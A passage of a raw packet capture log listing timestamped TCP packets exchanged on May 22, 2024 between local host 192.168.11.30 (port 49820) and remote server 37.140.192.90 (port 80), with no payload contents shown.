                                                                        May 22, 2024 17:33:26.774002075 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.774023056 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.774199009 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.774220943 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.774280071 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.774462938 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.774820089 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.774835110 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.775001049 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.775124073 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.775243044 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.775393963 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.775623083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.775643110 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.775849104 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.776177883 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.776249886 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.776447058 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.776535034 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.776587963 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.776779890 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.777173996 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.777194023 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.777421951 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.777532101 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.777658939 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.777790070 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:26.777980089 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.778095007 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:26.778359890 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.119713068 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.119811058 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120016098 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120121002 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120145082 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.120340109 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.120485067 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120532990 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120728016 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.120848894 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.120930910 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.121084929 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.121241093 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.121283054 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.121463060 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.121654034 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.121794939 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.122054100 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.122101068 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.122158051 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.122461081 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.122468948 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.122533083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.122709990 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.123037100 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123079062 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123254061 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.123274088 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123323917 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123502970 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.123784065 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123800993 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.123975039 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.124022961 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.124022961 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.124166012 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.124531984 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.124607086 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.124789953 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.124851942 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.125008106 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.125196934 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.125328064 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.125444889 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.125803947 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.126374960 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.126389027 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.126596928 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.126960993 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.126982927 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.127213001 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.127237082 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.127428055 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.127636909 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.127691031 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.127794981 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.127974987 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.128302097 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.128348112 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.128637075 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.465593100 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.465607882 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.465795040 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.465882063 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.465897083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466032982 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.466114998 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466247082 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466379881 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.466533899 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466548920 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466861010 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.466865063 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.466913939 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467060089 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.467340946 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467391014 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467576027 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467587948 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.467700005 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467808008 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467930079 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.467931032 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.468087912 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.468338966 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.468391895 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.468588114 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.468589067 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.468641996 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.468841076 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.469098091 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469110966 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469310045 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469321966 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.469433069 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469646931 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.469799995 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469815016 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.469980001 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.470112085 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470184088 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470361948 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.470376015 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470484018 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470738888 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.470778942 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470793962 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.470985889 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.471249104 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.471262932 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.471434116 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.471532106 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.471565962 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.471688986 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.471911907 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.471926928 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472078085 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.472129107 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472141981 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472415924 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.472587109 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472637892 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472793102 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.472847939 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.472862959 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473014116 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.473278046 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473326921 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473495007 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.473527908 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473576069 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473754883 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.473949909 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.473964930 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.474170923 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.474222898 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.474302053 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.474457026 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.474690914 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.474745989 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.474925041 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.474976063 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475053072 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475210905 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.475445986 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475495100 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475718021 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.475724936 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475779057 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.475965023 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.476097107 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.476147890 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.476289988 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.476391077 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.476511002 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.476732016 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.476764917 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.476885080 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.477044106 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.477155924 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.477168083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.477343082 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.477515936 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.477637053 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.477811098 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.477926016 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478054047 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478199959 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478254080 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.478305101 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478580952 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.478636980 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478648901 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478861094 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.478909969 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.479012966 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.479188919 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.479269028 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.479317904 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.479487896 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.811393976 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.811428070 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.811602116 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.811712027 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.811889887 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812086105 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812166929 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.812254906 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812526941 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.812623978 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812755108 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812880993 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812894106 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.812988997 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.813087940 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.813117981 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.813132048 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.813349962 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.813478947 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.813529968 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.813731909 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.813858032 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.814157009 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.814251900 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.814409018 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.814438105 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.814764977 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.814769983 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.814784050 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815025091 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.815224886 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815239906 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815431118 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815498114 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815551043 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.815689087 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.815706015 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815815926 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.815990925 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.816085100 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816101074 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816255093 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.816309929 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816324949 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816507101 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.816616058 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816725969 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816973925 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816987038 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.816987991 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.817178011 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.817245007 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.817332029 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.817488909 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.817550898 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.817560911 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.817871094 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.817919016 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.817931890 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818126917 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.818139076 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818181038 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818335056 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.818386078 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818448067 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818665028 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.818794966 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.818820953 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819036007 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.819178104 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819199085 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819361925 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.819514990 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819564104 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819691896 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.819772005 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819820881 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.819998980 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.820137024 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820405960 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820532084 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820732117 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.820759058 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820811987 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820900917 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821177006 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821227074 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821414948 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821440935 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821556091 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821681023 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821870089 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821903944 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822012901 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822149992 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822163105 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822287083 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822483063 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822530985 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822707891 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822856903 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822905064 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823118925 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823234081 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823260069 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823344946 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823378086 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823481083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823565960 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823721886 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823774099 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823942900 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824059010 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824158907 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824254990 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824419975 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824464083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824573994 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824678898 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824804068 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824904919 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825057030 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825119972 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825256109 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825385094 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825397015 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825623035 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825728893 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825741053 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825932026 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.826102018 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.826121092 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.826338053 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.826350927 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.826509953 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.826576948 CEST4982080192.168.11.3037.140.192.90
